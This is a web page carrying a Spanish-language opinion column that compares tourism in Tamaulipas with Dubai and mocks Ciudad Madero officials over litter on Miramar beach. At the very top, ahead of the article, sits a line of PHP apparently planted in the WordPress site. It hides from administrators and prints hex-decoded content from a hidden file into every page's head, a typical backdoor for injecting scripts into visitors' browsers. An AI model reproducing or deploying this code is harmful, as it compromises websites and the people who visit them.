if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Deberíamos ser más que  Dubai – Reporte Noreste
Conéctate con nosotros

Opinión

Deberíamos ser más que  Dubai

Deberíamos ser más que  Dubai

Una botella de plástico tarda más de 400 años en degradarse, mismo tiempo que supongo están esperando las autoridades de Tamaulipas para recargase con todo en la industria sin chimeneas.

Apenas el pasado 27 de septiembre se conmemoró el Día Mundial del Turismo ¿y usted sabe cómo se celebró esta fecha tan significativa en su municipio? Estoy seguro que no.

Dubai, una nación fundada 9 años después del estado de Tamaulipas tiene una población que apenas supera los 3 millones de habitantes, mientras que en la actualidad según datos estadísticos del 2020 somos casi 4 millones de tamaulipecos sobre esta superficie de 80, 249 metros cuadrados… ¿se preguntará y qué con todo eso?

Mientras Dubai es uno de los principales destinos turísticos por excelencia en el mundo, Tamaulipas que tiene todo, incluso para superar a la Riviera Maya o a la bahía de Acapulco, o al Pacifico con sus playas nayaritas y mazatlecas; Tamaulipas apenas y puede presumir: la playa de Miramar.

Y vamos muy lentos en el desarrollo turístico porque los tamaulipecos y sus visitantes no saben convivir y respetar el medio ambiente. Por eso mismo el Gobierno de Ciudad Madero se distrae exportando a los turistas a actuar de manera responsable, depositando la basura en los contenedores dispuestos para ello.

El director de Medio Ambiente y Cambio Climático, Jesús Alberto Olvera Vargas, a estas alturas de la vida, cuando la humanidad ya tiene un pie en Marte -bueno, ustedes no van a llegar porque no se preocupan por el planeta Tierra, y no queremos gente cochina allá-, le decía, este funcionario señaló que es necesario generar conciencia en la ciudadanía sobre la importancia de cuidar y conservar limpio nuestro máximo atractivo turístico.

Además como si el tema del Cambio Climático fuera nuevo, presumió que en la administración municipal, encabezada por Adrián Oseguera Kernion, se trabaja diariamente para ofrecer un destino limpio y seguro a los visitantes.

Olvera Vargas se perdió en su discurso o de plano ya tiene favorito para suceder a Oseguera en la persona de Zamir Shahin Zamudio “flamante” director general de Servicios Públicos.

El asunto es que Jesús Alberto Olvera Vargas, recomendó a los visitantes no introducir vidrio a la playa de Miramar para evitar que se contamine la arena, llevar una bolsa o caja para regresar al domicilio con los residuos generados, o bien, depositarlos en los contenedores que se encuentran a lo largo del Boulevard Costero.

Añadió que en caso de acudir con mascotas es importante llevar una bolsa para recoger las heces, depositar las colillas de cigarros en los contenedores especiales, además de respetar la flora y fauna de la playa.

Finalmente, remarcó que una bolsa de plástico tarda en degradarse 20 años, una lata de refresco 200 años, cubiertos de plástico 400 años, vaso de plástico 50 años, colillas de cigarro 10 años y una botella de plástico lo hace en 450 años, y son estos algunos de los artículos frecuentemente utilizados por los visitantes en playa Miramar.

En la intimidad… Yo esperaba ver a Olga Patricia Sosa Ruíz como titular de Turismo y a la Dra. Maki Esther Ortiz como secretaria de Salud en el gobierno morenista que encabezará Américo Villarreal Anaya… por cierto ¿dónde está Erasmo González Robledo?

davidcastellanost@hotmail.com
@dect1608

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Opinión